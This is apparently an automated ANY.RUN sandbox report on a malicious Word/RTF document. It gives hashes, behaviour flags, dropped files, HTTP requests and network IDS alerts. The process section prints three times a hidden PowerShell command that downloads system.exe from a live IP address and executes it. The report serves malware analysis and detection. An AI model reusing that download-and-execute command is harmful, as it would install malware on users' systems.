analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

be3fb05406957475d9b9a3995a92387aa4c91f5b12dada14d21105756ff818f6.doc

Full analysis: https://app.any.run/tasks/58e372f7-e579-4053-aa94-27db2b6ab5b1
Verdict: Malicious activity
Analysis date: October 20, 2020, 02:00:29
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

C6A17A0095233DEE19CCCCBA357DA256

SHA1:

5B0280D290572B00DA30D382681BB5FE8B6B5E2B

SHA256:

BE3FB05406957475D9B9A3995A92387AA4C91F5B12DADA14D21105756FF818F6

SSDEEP:

1536:9bxSTvHyjtHv9Yr9ae2o+CKwNR6+vLUSx+3Bjy6mAgaeeVhMDw5wfLu:9QlraRDAw5wf6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2492)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2492)
    • Requests a remote executable file from MS Office

      • WINWORD.EXE (PID: 2492)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2236)
      • powershell.exe (PID: 3016)
      • powershell.exe (PID: 2940)
  • INFO

    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 2492)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2492)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2492)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe powershell.exe powershell.exe powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2492"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\be3fb05406957475d9b9a3995a92387aa4c91f5b12dada14d21105756ff818f6.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3016"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://23.99.216.59/system/system.exe','C:\Users\admin\AppData\Roaming\system.exe');Start-Process 'C:\Users\admin\AppData\Roaming\system.exe'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2940"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://23.99.216.59/system/system.exe','C:\Users\admin\AppData\Roaming\system.exe');Start-Process 'C:\Users\admin\AppData\Roaming\system.exe'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2236"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://23.99.216.59/system/system.exe','C:\Users\admin\AppData\Roaming\system.exe');Start-Process 'C:\Users\admin\AppData\Roaming\system.exe'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 808
Read events
1 547
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
7
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2492WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR4163.tmp.cvr
MD5:
SHA256:
2492WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F389267E.png
MD5:
SHA256:
3016powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GF55UD5YX72MBVCB8VR4.temp
MD5:
SHA256:
2940powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2VUQ777LIYALVC7Z1LRE.temp
MD5:
SHA256:
2236powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NXS11V1AG5ZVFXCZGYIC.temp
MD5:
SHA256:
2236powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2d8784.TMPbinary
MD5:D6EE8C34E4C28999F00E385C8808E7DE
SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
2940powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2d863c.TMPbinary
MD5:D6EE8C34E4C28999F00E385C8808E7DE
SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
3016powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2d4ccd.TMPbinary
MD5:D6EE8C34E4C28999F00E385C8808E7DE
SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
2940powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:D6EE8C34E4C28999F00E385C8808E7DE
SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
3016powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:D6EE8C34E4C28999F00E385C8808E7DE
SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2492
WINWORD.EXE
GET
404
23.99.216.59:80
http://23.99.216.59/system/system.exe
US
html
274 b
suspicious
2492
WINWORD.EXE
GET
404
23.99.216.59:80
http://23.99.216.59/system/system.exe
US
html
274 b
suspicious
2940
powershell.exe
GET
404
23.99.216.59:80
http://23.99.216.59/system/system.exe
US
html
274 b
suspicious
2492
WINWORD.EXE
GET
404
23.99.216.59:80
http://23.99.216.59/system/system.exe
US
html
274 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3016
powershell.exe
23.99.216.59:80
Microsoft Corporation
US
suspicious
2492
WINWORD.EXE
23.99.216.59:80
Microsoft Corporation
US
suspicious
2940
powershell.exe
23.99.216.59:80
Microsoft Corporation
US
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
2492
WINWORD.EXE
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3016
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
2492
WINWORD.EXE
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
2492
WINWORD.EXE
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
2940
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
No debug info